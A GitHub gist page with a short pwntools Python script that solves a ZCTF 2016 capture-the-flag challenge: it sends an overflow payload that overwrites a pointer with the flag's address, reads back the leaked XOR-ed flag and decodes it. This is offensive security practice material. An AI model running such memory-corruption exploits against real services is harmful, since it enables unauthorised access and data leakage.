Skip to content

Instantly share code, notes, and snippets.

Created January 24, 2016 12:30
What would you like to do?
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
p = remote('', 22222)
flag_addr = 0x6010c0
p.sendline('ZCTF{' + '\x01'*29 + '\x00'*262 + p64(flag_addr+5))
p.recvuntil('***: ')
xored_flag = p.recv(29)
print 'ZCTF{' + ''.join([chr(ord(i) ^ 1) for i in xored_flag])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment